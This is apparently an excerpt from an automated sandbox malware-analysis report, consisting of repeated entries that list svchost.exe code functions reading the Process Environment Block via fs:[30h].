Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]	2_2_037B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]	2_2_0380634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]	2_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]	2_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]	2_2_0372826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]	2_2_0372A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]	2_2_03736259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]	2_2_037EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]	2_2_037EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]	2_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]	2_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]	2_2_0372823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]	2_2_038062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]	2_2_0380625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]	2_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]	2_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]	2_2_0372C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]	2_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]	2_2_03736154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]	2_2_03736154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]	2_2_03760124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]	2_2_038061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]	2_2_037F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]	2_2_037601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]	2_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]	2_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]	2_2_03804164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]	2_2_03804164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]	2_2_03770185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]	2_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]	2_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]	2_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]	2_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]	2_2_0375C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]	2_2_03732050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]	2_2_037B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]	2_2_037C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]	2_2_0372A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]	2_2_0372C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]	2_2_037B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0372C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]	2_2_037720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0372A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]	2_2_037380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]	2_2_037B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]	2_2_037B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]	2_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]	2_2_037280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]	2_2_037C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]	2_2_0373208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]	2_2_03738770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]	2_2_03730750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]	2_2_037BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]	2_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]	2_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]	2_2_037B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]	2_2_037AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]	2_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]	2_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]	2_2_03730710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]	2_2_03760710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]	2_2_0376C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]	2_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]	2_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_037BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]	2_2_037B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]	2_2_037307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]	2_2_037E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]	2_2_037D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]	2_2_03762674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]	2_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]	2_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]	2_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]	2_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]	2_2_0374C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]	2_2_0374E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]	2_2_03766620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]	2_2_03768620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]	2_2_0373262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]	2_2_03772619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]	2_2_037AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]	2_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]	2_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]	2_2_037666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0376C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]	2_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]	2_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]	2_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]	2_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
